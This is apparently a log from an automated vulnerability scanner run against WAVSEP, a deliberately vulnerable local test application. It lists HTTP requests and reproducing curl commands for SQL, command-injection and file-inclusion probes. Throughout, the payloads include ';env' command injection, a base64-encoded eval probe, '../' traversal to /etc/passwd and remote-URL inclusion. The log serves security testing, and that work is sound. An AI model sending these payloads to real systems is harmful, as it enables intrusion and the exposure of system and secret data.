curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp Content-Type: application/x-www-form-urlencoded username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp Content-Type: application/x-www-form-urlencoded username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp Content-Type: application/x-www-form-urlencoded username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp Content-Type: application/x-www-form-urlencoded username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp" -d "username=%3Benv&password=letmein"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
